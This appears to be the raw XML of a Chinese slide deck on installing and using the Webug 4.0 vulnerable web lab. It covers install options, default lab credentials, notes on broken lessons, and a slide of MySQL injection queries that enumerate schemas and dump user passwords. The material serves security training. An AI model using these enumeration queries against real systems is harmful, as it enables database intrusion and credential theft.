                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开之后报错，切换版本信息之后还是无法做。。。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2253506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AC518-0966-4FDD-A4B2-815B33CDCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="401273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_01</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A45F93B-7264-4F5E-AEF3-05D45850F801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>百度云：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{227E34EF-A4DD-46D0-8008-F4792D169ED6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3219809" y="2390905"/>
            <a:ext cx="7501704" cy="2707568"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26892225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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-29_webshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>爆破</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>密码： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>a1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="26057404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E86251-1445-4998-9FF0-26F1E4AEE8C8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416690"/>
            <a:ext cx="10131425" cy="511566"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Less-30_ssrf</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7B259F2D-6679-43CC-BB93-1119F142BD55}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1122219"/>
            <a:ext cx="12081165" cy="5597236"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开之后无法访问，丢弃</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2129357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AC518-0966-4FDD-A4B2-815B33CDCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="401273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_02</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A45F93B-7264-4F5E-AEF3-05D45850F801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="817963"/>
            <a:ext cx="10131425" cy="4973238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装方法：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源码版    没有乌云知识库</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机版</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.cnblogs.com/Rain99-/p/10570809.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>参考： </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://cloud.tencent.com/developer/article/1488183</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>推荐： 虚拟机版本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>/docker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1603142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AC518-0966-4FDD-A4B2-815B33CDCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="401273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_03</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A45F93B-7264-4F5E-AEF3-05D45850F801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="817963"/>
            <a:ext cx="10556794" cy="4973238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>虚拟机版本：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>下载之后解压</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>vmware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>打开即可！密码为空</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>在初次使用的时候，可以将虚拟机进行备份，防止出现问题的时候无法还原。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="464517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AC518-0966-4FDD-A4B2-815B33CDCC88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="401273"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>Webug4.0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_04</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A45F93B-7264-4F5E-AEF3-05D45850F801}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685801" y="817963"/>
            <a:ext cx="10556794" cy="4973238"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注意！！！</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>初次使用时：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>phpstudy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>中切换版本</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t> 切换为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>php-5.3.29-nts+Apache</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，否则</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入无解。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>登录密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>admin/admin</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{68FB1D68-00F2-4C6E-9E9E-410EE3AC0356}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4964505" y="1239867"/>
            <a:ext cx="5620367" cy="4800170"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3864374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6F526B-62CD-4378-8BA6-4ACB6C0005C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1111170" y="416689"/>
            <a:ext cx="10131425" cy="418689"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>补充知识</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="内容占位符 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF45D059-334D-4C16-8C9D-9166DFC32C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248356" y="1061157"/>
            <a:ext cx="11717866" cy="5380154"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>Mysql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>注入四大句：</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>schema_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.schemata</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_schema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘security’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>库名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>column_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>information_schema.columns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>=‘users’; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>表名</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>select </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>username,password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>security.users</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28376818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天体">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体">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TM02900743[[fn=环保]]</Template>
  <TotalTime>10543</TotalTime>
  <Words>5293</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>宽屏</PresentationFormat>
  <Paragraphs>275</Paragraphs>
  <Slides>51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51</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="56" baseType="lpstr">
      <vt:lpstr>等线</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Calibri</vt:lpstr>
      <vt:lpstr>Calibri Light</vt:lpstr>
      <vt:lpstr>天体</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>参考必读</vt:lpstr>
      <vt:lpstr>声明(重要！！！)</vt:lpstr>
      <vt:lpstr>Webug介绍</vt:lpstr>
      <vt:lpstr>Webug4.0安装_01</vt:lpstr>
      <vt:lpstr>Webug4.0安装_02</vt:lpstr>
      <vt:lpstr>Webug4.0安装_03</vt:lpstr>
      <vt:lpstr>Webug4.0安装_04</vt:lpstr>
      <vt:lpstr>补充知识_mysql注入</vt:lpstr>
